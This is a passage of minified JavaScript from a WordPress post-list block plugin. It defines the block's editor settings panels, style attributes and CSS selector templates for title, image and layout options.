inText:Te,metaAuthorPrefix:_e,metaDateFormat:Ee,authorLink:Se,onClick:e=>{Qe("meta"),et("meta")}}),t(4,a.ID),a.title&&X&&0==te&&(0,o.createElement)(g.Z,{title:a.title,headingTag:ke,titleLength:xe,titleStyle:Ce,onClick:e=>{Qe("title"),et("title")}}),t(3,a.ID),(0==r||de)&&le&&(0,o.createElement)(n.Z,{excerpt:a.excerpt,excerpt_full:a.excerpt_full,seo_meta:a.seo_meta,excerptLimit:W,showFullExcerpt:V,showSeoMeta:we,onClick:e=>{Qe("excerpt"),et("excerpt")}}),t(2,a.ID),(0==r||ue)&&pe&&(0,o.createElement)(m.Z,{readMoreText:ce,readMoreIcon:D,titleLabel:a.title,onClick:()=>{Qe("read-more"),et("read-more")}}),t(1,a.ID),(0==r||G)&&$&&"bottom"==ye&&(0,o.createElement)(c.Z,{meta:p,post:a,metaSeparator:Y,metaStyle:q,metaMinText:Te,metaAuthorPrefix:_e,metaDateFormat:Ee,authorLink:Se,onClick:e=>{Qe("meta"),et("meta")}}),t(0,a.ID),(0,h.o6)()&&Me&&(0,o.createElement)(f.Z,{dcFields:Ae,setAttributes:l,startOnboarding:Xe}))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:Ie})}(),je&&"loadMore"==De&&(0,o.createElement)(p.Z,{loadMoreText:We,onClick:e=>{Qe("pagination"),et("pagination")}}),je&&"navigation"==De&&"topRight"!=ze&&(0,o.createElement)(u.Z,{onClick:()=>{Qe("pagination"),et("pagination")}}),je&&"pagination"==De&&(0,o.createElement)(d.Z,{paginationNav:Fe,paginationAjax:Ze,paginationText:Ve,onClick:e=>{Qe("pagination"),et("pagination")}}))))}},17285:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=9,b=e=>{const{store:t}=e,{layout:l,queryType:n,advFilterEnable:r,advPaginationEnable:u,V4_1_0_CompCheck:{runComp:d}}=t.attributes,{context:y,section:b,setSettingTab:v,settingTab:h}=t;return g((()=>{(0,m.CH)(y,r,t,u)}),[r,u,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6837",store:t}),(0,o.createElement)(p.Sections,{settingTab:h,setSettingTab:v},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:!0,exclude:["columns","columnGridGap"],dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:0,data:{type:"layout",block:"post-list-2",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pl2/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pl2/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pl2/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pl2/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0}],variation:{layout1:{counterColor:"#767676"},layout2:{counterColor:"#767676"},layout3:{counterColor:"var(--postx_preset_Base_2_color)"},layout4:{counterColor:"var(--postx_preset_Base_2_color)"}}}},{position:3,data:{type:"range",key:"septSpace",min:0,max:80,step:1,responsive:!0,label:__("Spacing","ultimate-post")}},{position:4,data:{type:"toggle",key:"imgFlip",label:__("Image Flip","ultimate-post")}},{position:5,data:{type:"toggle",key:"mobileImageTop",label:__("Stack on Mobile","ultimate-post")}},{position:6,data:{type:"tag",key:"varticalAlign",label:__("Vertical Align","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"middle",label:__("Middle","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:b.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}},{position:8,data:{type:"dimension",key:"titleLgPadding",label:__("Padding Large Item","ultimate-post"),step:1,unit:!0,responsive:!0}}],exclude:["titleBackground"],hrIdx:[4,9]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:b.image,include:[{position:5,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:1,data:{type:"range",key:"largeimgSpacing",label:__("Large Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:2,data:{type:"range",key:"largeHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Large Image Height","ultimate-post")}},{position:3,data:{type:"range",key:"spaceLargeItem",min:0,max:100,step:1,unit:!0,responsive:!0,label:__("Large Item Space","ultimate-post")}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[6]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,depend:"metaShow",initialOpen:b.meta,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}}],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",store:t,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}}],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:b.excerpt,store:t,include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}},{position:4,data:{type:"toggle",key:"fullExcerptLg",label:__("Show Full Excerpt (Large Post)","ultimate-post")}},{position:5,data:{type:"range",key:"excerptLimitLg",label:__("Large Post Excerpt Limit","ultimate-post"),min:0,max:500,step:1,help:__("Excerpt Limit from Post Content.","ultimate-post")}}],hrIdx:[3,6]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:b["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.O2,{store:t,exclude:["contenWraptWidth","contenWraptHeight"]}),("layout3"===l||"layout4"===l)&&(0,o.createElement)(a.wT,{store:t}),(0,o.createElement)(a.Yp,{depend:"separatorShow",store:t,exclude:["septSpace"]}),!d&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:b.heading,depend:"headingShow"}),"posts"!=n&&"customPosts"!=n&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:b.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,initialOpen:b.pagination,depend:"paginationShow",store:t}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c,h&&s];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],include:[{position:7,data:{type:"dimension",key:"titleLgPadding",label:__("Padding Large Item","ultimate-post"),step:1,unit:!0,responsive:!0}}],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}},{position:4,data:{type:"toggle",key:"fullExcerptLg",label:__("Show Full Excerpt (Large Post)","ultimate-post")}},{position:5,data:{type:"range",key:"excerptLimitLg",label:__("Large Post Excerpt Limit","ultimate-post"),min:0,max:500,step:1,help:__("Excerpt Limit from Post Content.","ultimate-post")}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}}],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}],exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}}]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,incStyle:[{position:2,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:0,data:{type:"range",key:"largeimgSpacing",label:__("Large Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:1,data:{type:"range",key:"largeHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Large Image Height","ultimate-post")}},{position:2,data:{type:"range",key:"spaceLargeItem",min:0,max:100,step:1,unit:!0,responsive:!0,label:__("Large Item Space","ultimate-post")}}],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exStyle:["imgMargin"]}));default:return null}}},39220:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},largeHeight:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-image img { width: 100%; object-fit: cover; height: {{largeHeight}}; }"}]},spaceLargeItem:{type:"object",default:{lg:"60",xs:"25",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item:first-child { margin-bottom: {{spaceLargeItem}};}"}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!0},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover { text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"24",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"30",unit:"px"},transform:"",decoration:"none",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:15,unit:"px"},xs:{top:0,bottom:10,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLgPadding:{type:"object",default:{lg:{top:10,bottom:15,unit:"px"},xs:{top:"0",bottom:10,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title { padding:{{titleLgPadding}}; }"}]},titleLength:{type:"string",default:0},mobileImageTop:{type:"boolean",default:!1,style:[{selector:"@media (max-width: 768px) { {{ULTP}} .ultp-block-media .ultp-block-content-wrap { display: block;} }"}]},imgFlip:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"!=",value:["layout2","layout3"]}],selector:"{{ULTP}} .ultp-block-content-true .ultp-block-media, \n          {{ULTP}} .ultp-block-content-1 .ultp-block-media { flex-direction: row-reverse; }"}]},imgCrop:{type:"string",default:"full",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",depends:[{key:"showImage",condition:"==",value:!0}]},imgWidth:{type:"object",default:{lg:"40",ulg:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { height:fit-content; } \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { height:fit-content; } \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image img { height:{{imgHeight}}; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { object-fit:{{imageScale}}; }"}]},imgAnimation:{type:"string",default:"opacity"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-media .ultp-block-content-wrap { overflow:visible } \n          {{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-wrap { overflow:visible } \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"40",xs:"25"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-right: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-left: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-left: 0; margin-right: {{imgSpacing}}px; }"}]},largeimgSpacing:{type:"object",default:{lg:"15"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-image { margin-bottom: {{largeimgSpacing}}px; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; 